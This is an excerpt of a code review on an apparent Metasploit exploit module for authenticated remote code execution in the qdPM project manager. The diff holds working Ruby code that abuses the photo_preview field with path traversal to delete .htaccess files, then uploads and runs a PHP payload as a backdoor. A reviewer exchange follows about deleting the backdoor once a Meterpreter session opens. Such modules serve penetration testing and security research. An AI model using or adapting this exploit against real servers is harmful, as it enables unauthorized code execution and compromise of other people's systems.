modules/exploits/multi/http/qdpm_authenticated_rce.rb

```diff
@@ -0,0 +1,282 @@
+    user_id = opts['user_id']
+    email = opts['email']
+    csrf_token = opts['csrf_token']
+
+    data = [
+      { 'name' => 'sf_method', 'data' => 'put' },
+      { 'name' => 'users[id]', 'data' => user_id },
+      { 'name' => 'users[photo_preview]', 'data' => '.htaccess' },
+      { 'name' => 'users[_csrf_token]', 'data' => csrf_token },
+      { 'name' => 'users[new_password]', 'data' => '' },
+      { 'name' => 'users[email]', 'data' => email },
+      { 'name' => 'extra_fields[9]', 'data' => '' },
+      { 'name' => 'users[remove_photo]', 'data' => '1' }
+    ]
+
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri("#{base}/index.php/myAccount/update"),
+      'vars_form_data' => data,
+      'keep_cookies' => true,
+      'headers' => {
+        'Origin' => "http://#{rhost}",
+        'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"
+      }
+    )
+
+    data = [
+      { 'name' => 'sf_method', 'data' => 'put' },
+      { 'name' => 'users[id]', 'data' => user_id },
+      { 'name' => 'users[photo_preview]', 'data' => '../.htaccess' },
+      { 'name' => 'users[_csrf_token]', 'data' => csrf_token },
+      { 'name' => 'users[new_password]', 'data' => '' },
+      { 'name' => 'users[email]', 'data' => email },
+      { 'name' => 'extra_fields[9]', 'data' => '' },
+      { 'name' => 'users[remove_photo]', 'data' => '1' }
+    ]
+
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri("#{base}/index.php/myAccount/update"),
+      'vars_form_data' => data,
+      'keep_cookies' => true,
+      'headers' => {
+        'Origin' => "http://#{rhost}",
+        'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"
+      }
+    )
+
+    data = [
+      { 'name' => 'sf_method', 'data' => 'put' },
+      { 'name' => 'users[id]', 'data' => user_id },
+      { 'name' => 'users[_csrf_token]', 'data' => csrf_token },
+      { 'name' => 'users[new_password]', 'data' => '' },
+      { 'name' => 'users[email]', 'data' => email },
+      { 'name' => 'extra_fields[9]', 'data' => '' },
+      { 'name' => 'users[remove_photo]', 'data' => '1' },
+      { 'name' => 'users[photo]', 'data' => php_payload, 'mime_type' => 'application/octet-stream', 'filename' => fname }
+    ]
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri("#{base}/index.php/myAccount/update"),
+      'vars_form_data' => data,
+      'keep_cookies' => true,
+      'headers' => {
+        'Origin' => "http://#{rhost}",
+        'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"
+      }
+    })
+
+    return res.code == 302
+  end
+
+  def exec_php(base, _opts)
+    res = send_request_cgi({
+      'uri' => normalize_uri("#{base}/index.php/myAccount"),
+      'keep_cookies' => true
+    })
+    home_page = res.get_html_document
+    backdoor = home_page.at("//input[@name='users[photo_preview]']/@value").text.strip
+    register_file_for_cleanup(backdoor)
```

Comment:
Hi, actually this part should register the full, modified, PHP filename for cleanup. When loading the user `myAccount` page the name of the `photo_preview` entry is returned, allowing you to retrieve the full file name, including the prepended random string. This works fine on Linux for example, and even on Windows the correct filename is retrieved (and you get the "<the_file_name>.php might require manual cleanup" message)

Reply:
Sweet; I'm still not sure why `register_file_for_cleanup` is not working as expected here, but I changed my code to:
``
  def on_new_session(client)
    if @backdoor.nil?
      print_status("File to delete is nil")
    end
    if client.type == 'meterpreter' && target['Platform'] == 'win'
      begin
        client.fs.file.rm(@backdoor)
      rescue ::Exception => e
        print_error("Exception: #{e.inspect}")
      end
    end
  end

```
It also has the added benefit of making the exploit work much faster.